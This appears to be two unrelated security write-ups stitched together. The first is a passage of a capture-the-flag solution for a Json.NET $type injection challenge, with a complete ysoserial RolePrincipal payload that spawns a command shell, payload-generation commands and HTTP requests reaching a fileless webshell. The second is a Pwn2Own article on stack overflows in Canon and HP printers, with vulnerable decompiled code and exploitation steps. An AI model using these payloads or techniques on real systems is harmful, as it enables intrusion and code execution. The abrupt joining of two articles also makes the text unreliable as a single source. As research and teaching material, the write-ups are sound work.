{"$type":"System.Collections.Generic.Dictionary`2[[System.String, mscorlib],[System.String, mscorlib]], mscorlib","$type":"System.Web.Security.RolePrincipal, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"}

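The error message already hints at what went wrong. Digging a little into the code shows that our second $type does make Json.NET try to override the object type specified by the first $type, but at this point Json.NET checks whether the second type is compatible with the first, that is, whether it is assignable. If we could find a Dictionary-like class that works as a gadget, this code might become exploitable.

However, finding a new gadget is very hard, and even if one were found, it might be too demanding for a Wargame challenge. So I found a variant scenario instead. It relies on an uncommon setting, but I think it makes a very interesting challenge.

The key to this scenario is the MetadataPropertyHandling.ReadAhead setting. When the JsonSerializerSettings given to JsonConvert.DeserializeObject includes MetadataPropertyHandling.ReadAhead, Json.NET assumes that $type may not be the first property, so it first parses the JSON from start to end to locate $type before creating the object. In this scenario, our injected second $type directly overrides the value of the first one, so if the code is rewritten as follows, the Clone function becomes exploitable.

Dictionary<string, string> source = new Dictionary<string, string>();
source.Add("you control the key", "you control the value");
JsonSerializerSettings settings = new JsonSerializerSettings()
{
    TypeNameHandling = TypeNameHandling.All,
    MetadataPropertyHandling = MetadataPropertyHandling.ReadAhead
};
JsonConvert.DeserializeObject(JsonConvert.SerializeObject(source, settings), settings);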
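The duplicate-key behaviour can be observed outside .NET as well. The following Python sketch is only an analogy: it uses Python's standard json module, not Json.NET, and does not model ReadAhead itself. It shows that a serialized object can carry two "$type" keys and that a reader which keeps the last value ends up with the attacker's one. The shortened type names are illustrative.

```python
import json

ATTACKER_TYPE = "System.Web.Security.RolePrincipal, System.Web"

# Shape of the serializer output when the dictionary itself has a "$type" key:
# the serializer's own $type comes first, the attacker's entry second.
serialized = (
    '{"$type": "System.Collections.Generic.Dictionary`2[[System.String, mscorlib],'
    '[System.String, mscorlib]], mscorlib", '
    '"$type": "' + ATTACKER_TYPE + '"}'
)

# object_pairs_hook=list keeps every key/value pair, duplicates included.
pairs = json.loads(serialized, object_pairs_hook=list)
type_values = [value for key, value in pairs if key == "$type"]

# A reader that collapses duplicates by keeping the last one sees only
# the attacker-controlled type.
last_wins = dict(pairs)["$type"]
```

Whether the first or the last duplicate wins is a property of each parser, which is exactly why a setting that changes how metadata properties are located can change exploitability.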

We can test code execution with a real gadget. Here I use ysoserial.net to generate a payload for the RolePrincipal gadget ( ysoserial.exe -g RolePrincipal -f Json.Net -c calc ). Because this gadget only needs control over strings at a single JSON level to execute commands, it is relatively easy to build a challenge around.

Test run:

Dictionary<string, string> source = new Dictionary<string, string>();
source.Add("$type", "System.Web.Security.RolePrincipal, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
source.Add("System.Security.ClaimsPrincipal.Identities", "AAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAAswU8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtMTYiPz4NCjxPYmplY3REYXRhUHJvdmlkZXIgTWV0aG9kTmFtZT0iU3RhcnQiIElzSW5pdGlhbExvYWRFbmFibGVkPSJGYWxzZSIgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgeG1sbnM6c2Q9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PVN5c3RlbSIgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiPg0KICA8T2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KICAgIDxzZDpQcm9jZXNzPg0KICAgICAgPHNkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgICAgICA8c2Q6UHJvY2Vzc1N0YXJ0SW5mbyBBcmd1bWVudHM9Ii9jIGNhbGMiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw==");
JsonSerializerSettings settings = new JsonSerializerSettings()
{
    TypeNameHandling = TypeNameHandling.All,
    MetadataPropertyHandling = MetadataPropertyHandling.ReadAhead
};
JsonConvert.DeserializeObject(JsonConvert.SerializeObject(source, settings), settings);

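After running the code above, the calculator pops up!

Now that the setting is confirmed to be exploitable, what remained was wrapping it in an application scenario, and the hastily finished result is the My todolist challenge.

In theory, RolePrincipal alone is enough to execute system commands, but this exploit returns no command output, and we still need to locate and read the flag. To make the later steps easier, we can try turning the vulnerability into a web shell; for details, see my other article, 「玩轉 ASP.NET VIEWSTATE 反序列化攻擊、建立無檔案後門!」 (on ASP.NET VIEWSTATE deserialization attacks and fileless backdoors). The gadget used by that technique needs BinaryFormatter to run the OnDeserialization callback, which in turn triggers the gadget chain. However, if you clone the latest ysoserial.net and build it yourself, you will find a new parameter in the help message: --bgc.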

--bgc, --bridgedgadgetchains=VALUE
    Chain of bridged gadgets separated by comma (,). 
      Each gadget will be used to complete the next 
      bridge gadget. The last one will be used in the 
      requested gadget. This will be ignored when 
      using the searchformatter argument.

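That's right: the researchers contributing to this project found a gadget chain that bridges formatters whose gadgets need setters, such as Json.NET, into a second-stage deserialization through BinaryFormatter, which makes many more gadgets usable. These naturally include the two most important ones, ActivitySurrogateDisableTypeCheck and ActivitySurrogateSelectorFromFile, so we can once again use this feature to turn a deserialization attack into a fileless webshell exploit! The commands to generate the payloads: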

ysoserial.exe -g RolePrincipal -f Json.Net --bgc ActivitySurrogateDisableTypeCheck -c 1

ysoserial.exe -g RolePrincipal -f Json.Net --bgc ActivitySurrogateSelectorFromFile -c ".\ExploitClass.cs;dlls\System.dll;dlls\System.Web.dll"

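Finally, to solve the challenge, register normally, add any note and edit it, then send requests like the ones below once for each of the two payloads. This gives RCE with command output!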

Request 1:

POST /Api/UpdateTodo HTTP/1.1
Host: localhost:8003
Content-Type: application/x-www-form-urlencoded
Content-Length: xx
Cookie: <session>

uuid=00c3abe9-1f7c-4cda-8c24-60c59ac01f3f&field=$type&value=System.Web.Security.RolePrincipal,+System.Web,+Version%3d4.0.0.0,+Culture%3dneutral,+PublicKeyToken%3db03f5f7f11d50a3a

Request 2:

POST /Api/UpdateTodo HTTP/1.1
Host: localhost:8003
Content-Type: application/x-www-form-urlencoded
Content-Length: xx
Cookie: <session>

uuid=00c3abe9-1f7c-4cda-8c24-60c59ac01f3f&field=System.Security.ClaimsPrincipal.Identities&value=<payload>

Request 3:

POST /Api/MyProfile HTTP/1.1
Host: localhost:8003
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Cookie: <session>

cmd=whoami

Your printer is not your printer ! - Hacking Printers at Pwn2Own Part I


Printers have become one of the essential devices in the corporate intranet over the past few years, and their functionality has grown significantly. Beyond printing and faxing, cloud printing services like AirPrint are also supported to make them easier to use. Direct printing from mobile devices is now a basic requirement in the IoT era. We also use printers for internal business documents, which makes it even more important to keep them secure.

In 2021, we found pre-auth RCE vulnerabilities (CVE-2022-24673 and CVE-2022-3942) in Canon and HP printers, and a vulnerability (CVE-2021-44734) in Lexmark. We used these vulnerabilities to exploit the Canon ImageCLASS MF644Cdw, HP Color LaserJet Pro MFP M283fdw, and Lexmark MC3224i at Pwn2Own Austin 2021. Below, we describe the details of the Canon and HP vulnerabilities and their exploitation.

This research was also presented at HITCON 2022 and CODE BLUE 2022. You can check the slides here.

Printer

In the early days, connecting a printer to a computer often required an IEEE1284 or USB printer cable, and we also had to install the printer driver provided by the manufacturer. Nowadays, most printers on the market do not require a USB or traditional cable. As long as the printer is connected to the intranet through a LAN cable, we can find and use it immediately.

Printers also provide not only printing but also various services such as FTP, AirPrint, and Bonjour, all to make printing more convenient.

Motivation

Why do we want to research printers?

Red Team

During red team assessments, we found that printers are almost always present in the corporate intranet, usually more than one, but they are often overlooked and lack updates. A printer is also an excellent place for a red team to hide its activity, because it is often difficult to detect. It is worth mentioning that larger enterprises are also likely to connect printers to AD, which makes them an entry point to confidential information.

Pwn2Own Austin 2021

Another reason is that printers have become one of the main targets of Pwn2Own Mobile. We were also preparing to participate in Pwn2Own again, so we decided to start with them.

At first, we thought they were trivial. Like most IoT devices, there are often many command injection vulnerabilities. However, many printers use RTOS instead of Linux systems, which drove our determination to challenge it.

This article will focus on the Canon and HP parts.

Analysis

In the beginning, we read many articles, and all of them tore down the hardware for analysis to obtain a debug console, then dumped memory to obtain the original firmware. In the end, we chose another way and didn’t tear down any of the printers.

Canon

Firmware Extract

The initial version we analyzed was v6.03. We tried binwalk on it at first, but the firmware is obfuscated, so we could not analyze it directly.

Obfuscated Canon ImageCLASS MF644Cdw firmware

We also tried “TREASURE CHEST PARTY QUEST: FROM DOOM TO EXPLOIT” by Synacktiv and “Hacking Canon Pixma Printers – Doomed Encryption” by Contextis research. But this time, it’s an entirely different series, and we can’t use the same method to deobfuscate the firmware.

So we started to analyze the obfuscated firmware format and content.

We can see from the obfuscated firmware that the beginning is the Magic NCFW, followed by the size of the firmware, and other parts are obfuscated data.

So we started to think that maybe the old firmware of this printer is not obfuscated until a specific version. If we can get the intermediate version, maybe there is a chance to get the deobfuscation method. The magic header also lets us distinguish whether it is obfuscated.

We can obtain the firmware download URL through the official website or the update packet.

https://pdisp01.c-wss.com/gdl/WWUFORedirectTarget.do?id=MDQwMDAwNDc1MjA1&cmp=Z01&lang=EN

After analysis, it can be split into three parts.

We can roughly infer the rules of the download URL. We use this method to download all versions of firmware. The versions we downloaded at that time included:

  • V2.01
  • V4.02
  • V6.03
  • V9.03
  • V10.02

V10.02 was a version that would only be released a few weeks later, but it could already be downloaded this way. After downloading all versions, we found that every firmware version for this series is obfuscated, so there was no way to recover the deobfuscation method from an earlier version.

But we can try downloading Canon’s other series firmware and find out if there is a similar obfuscation algorithm. After all the firmware is downloaded, the total file size is 130 GB. We can find unobfuscated firmware by grepping for NCFW and servicemode.html.
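The grep step can be sketched as a small scan over a directory of downloaded images. This Python sketch is a guess at one workable approach, not the tooling we used: it treats a file that contains both the NCFW magic and the plain string servicemode.html as a candidate for unobfuscated firmware. The function names and directory layout are hypothetical.

```python
from pathlib import Path

MAGIC = b"NCFW"
MARKER = b"servicemode.html"


def is_plaintext_candidate(blob: bytes) -> bool:
    """True when both markers are visible in clear text in the image."""
    return MAGIC in blob and MARKER in blob


def find_candidates(firmware_dir: str):
    """Yield paths under firmware_dir whose contents pass the check."""
    for path in sorted(Path(firmware_dir).rglob("*")):
        if path.is_file() and is_plaintext_candidate(path.read_bytes()):
            yield path
```

For a 130 GB corpus, reading each file fully into memory may be impractical; a chunked or memory-mapped search would be the natural refinement.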

Finally, we found four firmware images that met the conditions. We chose the WG7000 series printers to analyze and found the suspected deobfuscation function.

Fortunately, by rewriting this function, the MF644Cdw firmware can be deobfuscated.

After the firmware was extracted, we needed the image base address so that IDA could correctly identify and reference the strings. At first, we looked for the image base with the common analysis tool rbasefind.

The first base we found was 0x40b0000. But after decompiling with IDA, most of the functions did not correspond to their debug message strings.

As shown in the figure above, loc_4489AC08 should point to the function name string, but this address does not hold a regular string. Instead, it is recognized as part of a code section, and its content is not a string. This indicates that the address is not the real one. We concluded that the base was off by a small offset, although this did not cause big problems for decompiling functions.

How did we solve this problem? We first found a function whose name we knew, together with the function name string that belongs to it, and used the pair to compute the adjustment. After finding the offset, we adjusted the image base to the correct address. The final image base is 0x40affde0. After the adjustment, the original function names are identified correctly.
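The adjustment itself is simple arithmetic. The Python sketch below assumes a flat image loaded at a single base, so that a pointer value equals base plus file offset. The pointer value 0x40B00DE0 and the file offset 0x1000 are made-up numbers chosen to reproduce the final base from the text; they are not taken from the firmware.

```python
def corrected_image_base(pointer_value: int, string_file_offset: int) -> int:
    """Derive the load address from one known pointer/target pair.

    pointer_value      : address used by the code to reference the string
    string_file_offset : where that string actually sits in the image file
    """
    return pointer_value - string_file_offset


def to_file_offset(address: int, image_base: int) -> int:
    """Map a runtime address back to a file offset for a given base."""
    return address - image_base


# Hypothetical pair: a debug call passes 0x40B00DE0 as the function-name
# pointer, and the matching name string is found at file offset 0x1000.
base = corrected_image_base(0x40B00DE0, 0x1000)
```

A second known pair is a cheap sanity check: both should yield the same base.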

Next, we could analyze the firmware normally. After preliminary analysis, the architecture of the Canon ImageCLASS MF644Cdw is as follows:

  • OS - DryOSV2
    • Customized RTOS by Canon
  • ARMv7 32bit little-endian
  • Linked with application code into single image
    • Kernel
    • Service

HP

HP’s firmware is relatively easy to obtain. We can use binwalk -Z to obtain the correct firmware. It took about 3-4 days. The other steps, such as finding the image base address, are just the same as Canon. After preliminary analysis, the architecture of HP Color LaserJet Pro MFP M283fdw is as follows:

  • OS
    • RTOS - Modify from ThreadX/Green Hills
  • ARM11 Mixed-endian
    • Code - little-endian
    • Data - Big-endian

Attack Surface

Many services are enabled by default in most printers on the market today.

Service | Port | Description
RUI | TCP 80/443 | Web interface
PDL | TCP 9100 | Page Description Language
PJL | TCP 9100 | Printer Job Language
IPP | TCP 631 | Internet Printing Protocol
LPD | TCP 515 | Line Printer Daemon Protocol
SNMP | UDP 161 | Simple Network Management Protocol
SLP | TCP 427 | Service Location Protocol
mDNS | UDP 5353 | Multicast DNS
LLMNR | UDP 5355 | Link-Local Multicast Name Resolution

Usually, the RUI (web interface) is enabled to facilitate management. Port 9100 is also commonly used by printers, mainly to transmit print data.

Other services vary between vendors, but the ones listed are usually present, and most are enabled by default. After evaluating the overall architecture, we focused on service discovery and the DNS family of services. In our experience, vendor implementations of such protocols are often prone to vulnerabilities. The primary services we analyzed were SLP, mDNS, and LLMNR.

Next, we take Pwn2Own Austin 2021 as a case study to see what problems these protocols often have.

Hacking printers at Pwn2Own

Canon

Service Location Protocol

SLP is a service discovery protocol that allows computers and other devices to find services in a local area network. In the past, there were many vulnerabilities in ESXi’s SLP. Canon implements the SLP service mainly by themselves. For details about the SLP service, please refer to RFC2608.

Before we look into the detail of SLP, we need to talk about the structure of SLP packets.

SLP Packet Structure

Here we only need to pay attention to function-id. This field determines the request type and the format of the payload part. Canon only implements Service Request and Attribute Request.

In the Attribute Request (AttrRqst), the user can obtain the attribute list according to the service and scope. We can specify a scope to look for, such as Canon printers.

Example:

The Attribute Request structure is as follows

It mainly comprises a length (Length) and a value (Value) for each field. This kind of format must be parsed carefully because bugs are common here. In fact, Canon has a vulnerability when parsing this format.
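A careful length/value reader checks every declared length against the bytes actually received. The Python sketch below follows the AttrRqst body layout from RFC 2608 (PRList, URL, scope-list, tag-list, SPI, each preceded by a 2-byte big-endian length); the helper names are hypothetical and the SLP header is not parsed here.

```python
import struct


def pack_lv(value: bytes) -> bytes:
    """Encode one field as a 2-byte big-endian length followed by the value."""
    return struct.pack(">H", len(value)) + value


def read_lv(buf: bytes, offset: int):
    """Read one length/value field, refusing lengths that overrun the packet."""
    if offset + 2 > len(buf):
        raise ValueError("truncated length field")
    (length,) = struct.unpack_from(">H", buf, offset)
    start = offset + 2
    end = start + length
    if end > len(buf):
        raise ValueError("declared length exceeds packet")
    return buf[start:end], end


def parse_attr_rqst_body(body: bytes) -> dict:
    """Split an AttrRqst body into its five length-prefixed fields."""
    fields = {}
    offset = 0
    for name in ("prlist", "url", "scope_list", "tag_list", "spi"):
        fields[name], offset = read_lv(body, offset)
    return fields


sample = b"".join(
    pack_lv(v) for v in (b"", b"service:printer", b"DEFAULT", b"", b"")
)
parsed = parse_attr_rqst_body(sample)
```

Bounding the read is only half of the job: any later transformation of a field, such as unescaping, needs its own bound on the destination side.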

Vulnerability

When it parses the scope list, it converts escape characters to ASCII. For example, \41 will be converted to A. But what’s wrong with this simple transformation? Let’s take a look at the pseudocode.

int parse_scope_list(...){
    char destbuf[36];
    unsigned int max = 34;
    parse_escape_char(..., destbuf, max);
}

As shown in the above code, in parse_scope_list, it passes a fixed size buffer destbuf and the maximum size 34 to parse_escape_char. No vulnerability here. Let’s take a look at parse_escape_char.

int __fastcall parse_escape_char(unsigned __int8 **pdata, _WORD *pdatalen, unsigned __int8 *destbuf, _WORD *max)
{
  unsigned int idx; // r7
  int v7; // r9
  int v8; // r8
  int error; // r11
  unsigned __int8 *v10; // r5
  unsigned int i; // r6
  int v12; // r1
  int v13; // r0
  unsigned int v14; // r1
  bool v15; // cc
  int v16; // r2
  bool v17; // cc
  unsigned __int8 v18; // r0
  int v19; // r0
  unsigned __int8 v20; // r0
  unsigned int v21; // r0
  unsigned int v22; // r0

  idx = 0;
  v7 = 0;
  v8 = 0;
  error = 0;
  v10 = *pdata;
  for ( i = (unsigned __int16)*pdatalen; i && !v7; i = (unsigned __int16)(i - 1) )
  {
    v12 = *v10;
    if ( v12 == ',' )
    {
      if ( i < 2 )
        return -4;
      v7 = 1;
    }
    else
    {
      if ( v12 == '\\' ) //----------------------[1]
      {
        if ( i < 3 )
          return -4;
        v13 = v10[1];
        v14 = v13 - '0';
        v15 = v13 - (unsigned int)'0' > 9;
        if ( v13 - (unsigned int)'0' > 9 )
          v15 = v13 - (unsigned int)'A' > 5;
        if ( v15 && v13 - (unsigned int)'a' > 5 )
          return -4;
        v16 = v10[2];
        v17 = v16 - (unsigned int)'0' > 9;
        if ( v16 - (unsigned int)'0' > 9 )
          v17 = v16 - (unsigned int)'A' > 5;
        if ( v17 && v16 - (unsigned int)'a' > 5 )
          return -4;
        if ( v14 <= 9 )
          v18 = 0x10 * v14;
        else
          v18 = v13 - 0x37;
        if ( v14 > 9 )
          v18 *= 0x10;
        *destbuf = v18; //-------------------[2]
        v19 = v10[2];
        v10 += 2;
        v20 = (unsigned int)(v19 - 0x30) > 9 ? (v19 - 55) & 0xF | *destbuf : *destbuf | (v19 - 0x30) & 0xF;
        *destbuf = v20;
        LOWORD(i) = i - 2;
        if ( !strchr((int)"(),\\!<=>~;*+", *destbuf) )
        {
          v21 = *destbuf;
          if ( v21 > 0x1F && v21 != 0x7F )
            return -4;
        }
        goto LABEL_40;
      }
      if ( strchr((int)"(),\\!<=>~;*+", v12) ) //-----------------------[3]
        return -4;
      v22 = *v10;
      if ( v22 <= 0x1F || v22 == 0x7F )
        return -4;
      if ( v22 != ' ' )
      {
        v8 = 0;
        goto LABEL_35;
      }
      if ( !v8 )
      {
        v8 = 1;
LABEL_35:
        if ( (unsigned __int16)*max <= idx ) //----------------------[4]
        {
          error = 1;
          goto next_one;
        }
        if ( v8 )
          LOBYTE(v22) = 32;
        *destbuf = v22;
LABEL_40:
        ++destbuf;
        idx = (unsigned __int16)(idx + 1);
      }
    }
next_one:
    ++v10;
  }
  if ( error )
  {
    *max = 0;
    debugprintff(3645, 4, "Scope longer than buffer provided");
LABEL_48:
    *pdata = v10;
    *pdatalen = i;
    return 0;
  }
  if ( idx )
  {
    *max = idx;
    goto LABEL_48;
  }
  return -4;
}

You can see that [3] is the case that handles non-escaped characters, and it checks whether the length exceeds the maximum at [4]. However, the case at [1], which handles escape characters, has no length check, and the converted result is written directly to the destination buffer at [2].

Given a long enough string of escape sequences, this leads to a stack overflow.
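The asymmetry between the two branches can be modelled in a few lines. This Python sketch is a simplified model, not a port of the decompiled function: it ignores commas, reserved characters, and space folding, and keeps only the two paths that matter. The check_escapes flag is a hypothetical switch that turns the missing bound on or off.

```python
def decode_scope(data: bytes, max_len: int, check_escapes: bool = True) -> bytes:
    """Decode \\XX escapes into bytes, writing at most max_len bytes.

    With check_escapes=False the escape branch skips the bound, mirroring
    the flaw described above; the plain-character branch is always checked.
    """
    out = bytearray()
    i = 0
    while i < len(data):
        if data[i:i + 1] == b"\\":
            if i + 3 > len(data):
                raise ValueError("truncated escape")
            value = int(data[i + 1:i + 3].decode("ascii"), 16)
            if check_escapes and len(out) >= max_len:
                raise ValueError("scope longer than buffer")
            out.append(value)
            i += 3
        else:
            if len(out) >= max_len:
                raise ValueError("scope longer than buffer")
            out.append(data[i])
            i += 1
    return bytes(out)


payload = b"\\41" * 40  # forty escaped 'A' characters
unchecked_len = len(decode_scope(payload, 34, check_escapes=False))
```

In the model the output simply grows past max_len; on the device the same writes land beyond a 36-byte stack buffer.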

After finding the vulnerability, the first thing is to see what protection it has to decide on the exploit plan. But after analysis, we found that the Canon printer does not have any memory-related protection.

Protection

  • No Stack Guard
  • No DEP
  • No ASLR

No Stack Guard, no DEP, and no ASLR: hacker friendly! It is like going back to the 90s, when a single stack overflow could control the world. Next, as in classic stack overflow exploits, we just need to find a fixed address to store the shellcode, overwrite the return address, and jump to the shellcode. Eventually, we found that the BJNP service could be used to store our shellcode.

BJNP

BJNP is also a service discovery protocol designed by Canon, and there have been many vulnerabilities in the past. Synacktiv has also exploited Pixma MX925 through this protocol. For more details, please refer to here. BJNP stores the controllable session data in the global buffer. We can use this function to put our shellcode in a fixed location without strict restrictions.

Exploitation Step

  • Use BJNP to store our shellcode on a global buffer
  • Trigger stack overflow in SLP and overwrite return address
  • Return to the global buffer

Pwn2Own Austin 2021

Generally, the Pwn2Own organizer(ZDI) requests participants to prove that we have pwned the target. The presentation method here is up to players. Initially, we wanted to print the logo directly on the LCD screen as we exploited the Lexmark printer.

However, we spent a lot of time figuring out how to print the image on the screen, which was longer than finding vulnerabilities and writing exploits. In the end, a safer approach was adopted because of the time constraints, directly changing the Service Mode string and printing it on the screen.

In fact, it is not that difficult to print the image on the screen. Other teams have found methods. Those who are interested can try it out :)

Debug

Some people may wonder how to debug in this environment. There are usually several ways to debug:

  • Tear down the printer and get a debug console.
  • Use an old exploit to install a customized debugger.

However, we had already updated to the latest firmware at that time, and there was no known vulnerability in that version, so using an old exploit would have required downgrading. Tearing down the hardware would also have taken additional time and cost. Since we already had a vulnerability, neither option was cost-effective. In the end, we used the most traditional sleep debug method.

After ROP or executing shellcode, print the result to a web page or other visible place, then call sleep. We can read the result from the web page and finally restart the machine to repeat this process.

Next, let’s talk about HP printers.

HP

LLMNR is very similar to mDNS. It provides basic name resolution on the same local link, but it is more straightforward than mDNS and usually works together with some service discovery protocols. Here is a brief introduction to this mechanism:

For name resolution in a local area network, Client A first uses multicast to find the location of Client C in the local area network.

After Client C receives the query, it replies to Client A, which completes the link-local name resolution.

LLMNR is mainly based on the DNS packet format, and the format is as follows:

The main format is the header followed by Queries, and Count represents the number of queries of different types.

Each DNS Query is composed of many labels, and each label will comprise length and string, as shown in the figure above. There is also a Message Compression mechanism. Dealing with these is very prone to vulnerabilities. “THE COST OF COMPLEXITY: Different Vulnerabilities While Implementing the Same RFC” at BlackHat 2021 also mentions similar problems.
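The label encoding described above can be written out directly. This Python sketch follows the standard DNS wire format (each label is a length byte followed by that many bytes, terminated by a zero byte, and a compression pointer is two bytes whose top two bits are set); the function names are hypothetical.

```python
def encode_name(name: str) -> bytes:
    """Encode a dotted name as length-prefixed labels plus a zero terminator."""
    out = bytearray()
    for label in name.strip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) <= 63:
            raise ValueError("label must be 1..63 bytes")
        out.append(len(raw))
        out += raw
    out.append(0)
    return bytes(out)


def compression_pointer(offset: int) -> bytes:
    """Encode a message-compression pointer to an earlier offset."""
    if not 0 <= offset < 0x4000:
        raise ValueError("pointer offset must fit in 14 bits")
    return bytes([0xC0 | (offset >> 8), offset & 0xFF])


wire = encode_name("printer.local")
```

The 63-byte label limit exists because the top two bits of the length byte are reserved for pointers, which is also why a parser has to branch on that byte before trusting it as a length.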

Vulnerability

Let’s look at HP’s implementation:

int llmnr_process_query(...){
    char result[292];
    consume_labels(llmnr_packet->qname,result,...);
    ...
}

Here you can see that when HP processes LLMNR packets, it passes a fixed-size buffer to consume_labels. consume_labels is used to process DNS labels, and the fixed buffer stores the result.

int __fastcall consume_labels(char *src, char *dst, llmnr_hdr *a3)
{
  int v3; // r5
  int v4; // r12
  unsigned int len; // r3
  int v6; // r4
  char v7; // r6
  bool v8; // cc
  int v9; // r0
  unsigned __int8 chr; // r6
  int result; // r0

  v3 = 0;
  v4 = 0;
  len = 0;
  v6 = 0;
  while ( 1 )
  {
    chr = src[v3]; //-------------[1]
    if ( !chr )
      break;
    if ( (int)len <= 0 )
    {
      v8 = chr <= 0xC0u;
      if ( chr == 0xC0 )
      {
        v9 = src[v3 + 1];
        v6 = 1;
        v3 = 0;
        src = (char *)a3 + v9;
      }
      else
      {
        len = src[v3++];
        v8 = v4 <= 0;
      }
      if ( !v8 )
        dst[v4++] = '.';
    }
    else
    {
      v7 = src[v3++];
      len = (char)(len - 1);
      dst[v4++] = v7; //----------[2]
    }
  }
  result = v3 + 1;
  dst[v4] = 0;
  if ( v6 )
    return 2;
  return result;
}

At [1], the function reads the next byte and handles it according to its type: a length byte, a compression pointer (0xC0), or label data. [2] handles the ordinary case in which label bytes are copied. There is no length check here, and the label is written directly into the dst buffer, leading to a stack overflow. At this point, we thought we could exploit it in much the same way as Canon. However, while writing the exploit, we found that HP printers have more protection mechanisms.
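For contrast, the following is a minimal sketch of a label decoder that checks every write against the size of the destination buffer and caps the number of compression jumps. It is our own illustration, not HP's patch: the name decode_name_checked, the jump limit of 16, and the treatment of pointers as a 14-bit offset from the start of the message are assumptions.

```c
#include <assert.h>
#include <stddef.h>

/* Decode the DNS name starting at msg[off] into dst as a dotted,
 * NUL-terminated string. Returns the decoded length, or -1 on
 * malformed input or when dst is too small. */
int decode_name_checked(const unsigned char *msg, size_t msg_len, size_t off,
                        char *dst, size_t dst_size)
{
    size_t out = 0;
    int jumps = 0;

    assert(msg != NULL && dst != NULL);
    if (dst_size == 0)
        return -1;

    while (off < msg_len) {
        unsigned char len = msg[off];

        if (len == 0) {                       /* end of name */
            dst[out] = '\0';
            return (int)out;
        }
        if ((len & 0xC0) == 0xC0) {           /* compression pointer */
            if (off + 1 >= msg_len || ++jumps > 16)
                return -1;                    /* truncated or looping */
            off = ((size_t)(len & 0x3F) << 8) | msg[off + 1];
            continue;
        }
        if (len > 63 || off + 1 + len > msg_len)
            return -1;                        /* bad label or packet overrun */
        /* Room for an optional '.', the label, and the final NUL. */
        if (out + (out ? 1 : 0) + len + 1 > dst_size)
            return -1;
        if (out)
            dst[out++] = '.';
        for (unsigned char i = 0; i < len; i++)
            dst[out++] = (char)msg[off + 1 + i];
        off += 1 + (size_t)len;
    }
    return -1;                                /* ran off the end of the packet */
}
```

The key difference from the decompiled code is that the destination size travels with the destination pointer, so an oversized name is rejected instead of being written past the 292-byte stack buffer.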

Protection

  • No Stack Guard
  • XN(DEP)
  • Memory Protection Unit (MPU)
  • No ASLR

In this case, the XN and MPU memory protection mechanisms are enabled, and the vulnerability itself has more restrictions. We can overflow only about 0x100 bytes, and the payload cannot contain null bytes. This significantly restricts our ROP chain, so we need to find other vulnerabilities or methods to achieve our goal.

After a while, we started thinking about how HP printers implement XN(DEP) and MPU. Let’s review HP RTOS:

  • Linked with application code into single image
  • Many tasks run
    • in the same virtual address space
    • in kernel-mode

After reviewing, we thought, can we bypass it by understanding the MMU and MPU in HP RTOS?

MMU in HP M283fdw

The HP M283fdw uses single-level page table translation, and each translation table entry translates a 1MB section. The translation table is located at 0x4003c000.

Each translation table entry corresponds to a physical address and the permissions of the section. The CPU determines whether it can be executed or modified according to the entry. The permissions related here are AP, APX, and XN. We can also map any physical address through this translation table entry.
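As a rough illustration of what such an entry holds, the sketch below decodes a first-level section descriptor and computes where the entry for a given virtual address lives. It assumes the standard ARMv6 short-descriptor layout (section base in bits 31:20, APX in bit 15, AP in bits 11:10, XN in bit 4); the article does not show HP's actual table contents, and the helper names and the sample values are ours.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define TT_BASE 0x4003c000u   /* translation table address given in the text */

struct section_entry {
    uint32_t phys_base;  /* bits [31:20]: physical base of the 1MB section */
    unsigned ap;         /* bits [11:10]: access permission */
    unsigned apx;        /* bit 15: access permission extension */
    unsigned xn;         /* bit 4: execute-never */
};

/* Address of the first-level entry that translates virtual address va:
 * one 4-byte entry per 1MB of virtual address space. */
uint32_t tt_entry_addr(uint32_t va)
{
    return TT_BASE + (va >> 20) * 4u;
}

/* Decode a first-level descriptor. Returns 0 if it is not a section
 * descriptor (low bits other than 0b10), 1 otherwise. */
int decode_section(uint32_t desc, struct section_entry *out)
{
    assert(out != NULL);
    if ((desc & 0x3u) != 0x2u)
        return 0;
    out->phys_base = desc & 0xFFF00000u;
    out->xn  = (desc >> 4) & 1u;
    out->ap  = (desc >> 10) & 3u;
    out->apx = (desc >> 15) & 1u;
    return 1;
}

/* Return the same descriptor with full read/write access and execution
 * allowed: APX = 0, AP = 0b11, XN = 0. */
uint32_t make_rwx(uint32_t desc)
{
    desc &= ~((1u << 4) | (1u << 15));
    desc |= 3u << 10;
    return desc;
}
```

Under these assumptions, making a section writable and executable is a single 32-bit write to the address returned by tt_entry_addr, which is why an attacker with a write primitive targets the table.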

